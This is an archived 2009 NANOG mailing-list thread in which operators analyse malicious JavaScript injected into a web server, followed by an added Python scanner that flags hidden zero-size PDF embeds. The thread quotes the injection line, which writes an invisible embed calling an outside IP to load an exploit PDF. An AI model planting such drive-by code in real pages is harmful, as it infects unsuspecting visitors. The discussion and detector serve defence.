nanog mailing list archives
Re: Malicious code just found on web server
From: Chris Mills <securinate () gmail com>
Date: Fri, 17 Apr 2009 18:34:54 -0400
You beat me to it.

-ChrisAM

On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster () gmail com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster () gmail com> wrote:
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate () gmail com> wrote:
>>> I took a quick look at the code... formatted it in a pastebin here:
>>> http://pastebin.com/m7b50be54
>>>
>>> That javascript writes this to the page (URL obscured):
>>>
>>> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>>>
>>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>>
>>> Below the javascript, it grabs a PDF:
>>>
>>> <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
>>>
>>> That PDF is on the site, I haven't looked at it yet though.
>>
>> Most likely a file that exploits a well-known vulnerability in Adobe
>> Reader, which in turn probably loads malware from yet another location.
>>
>> We've been seeing a lot of this lately.
>
> Yes, definitely malicious:
>
> http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
>
> - - ferg
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Desktop 9.5.3 (Build 5003)
>
> wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
> /K0hKsJiAz4RGu8VQkyP+js=
> =AzJq
> -----END PGP SIGNATURE-----
>
> --
> "Fergie", a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawgster(at)gmail.com
> ferg's tech blog: http://fergdawg.blogspot.com/
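
A defensive check for the pattern described in this message (a plugin element declared 0 or 1 pixel wide or high that loads a PDF), added here as an example and not part of the original thread. The sample markup, `host.example`, and all function names are constructed for illustration.

```python
from html.parser import HTMLParser

PLUGIN_TAGS = {"embed", "object", "iframe"}
MAX_HIDDEN_PX = 1  # the elements quoted in the thread use width/height of 0 and 1

def _px(value):
    """Return a width/height attribute as an int pixel count, or None."""
    v = (value or "").strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return int(v) if v.isdecimal() else None

class HiddenEmbedFinder(HTMLParser):
    """Collects plugin elements whose declared width or height is <= MAX_HIDDEN_PX."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in PLUGIN_TAGS:
            return
        a = dict(attrs)
        w, h = _px(a.get("width")), _px(a.get("height"))
        if not any(d is not None and d <= MAX_HIDDEN_PX for d in (w, h)):
            return
        src = a.get("src") or a.get("data") or ""
        path = src.lower().split("?")[0]
        is_pdf = (a.get("type") or "").lower() == "application/pdf" or path.endswith(".pdf")
        self.findings.append({"tag": tag, "src": src, "width": w, "height": h,
                              "pdf": is_pdf, "line": self.getpos()[0]})

def find_hidden_embeds(html):
    parser = HiddenEmbedFinder()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page: one visible embed, one script-written embed, one static hidden PDF.
SAMPLE = '''<html><body>
<embed src="movie.swf" width="400" height="300">
<script>document.write("<embed src=\\"http://host.example/spl.php\\" width=\\"0\\" height=\\"0\\" type=\\"application/pdf\\"></embed>");</script>
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
</body></html>'''
# Constructed: the markup the script above writes, as it would appear in the rendered DOM.
RENDERED = '<embed src="http://host.example/spl.php" width="0" height="0" type="application/pdf"></embed>'

if __name__ == "__main__":
    for label, doc in (("static", SAMPLE), ("rendered", RENDERED)):
        for f in find_hidden_embeds(doc):
            print(label, f)
```

The static pass reports only `include/two.pdf`; an element written by `document.write` is script text to the parser, so it shows up only when the scanner is run over the rendered DOM.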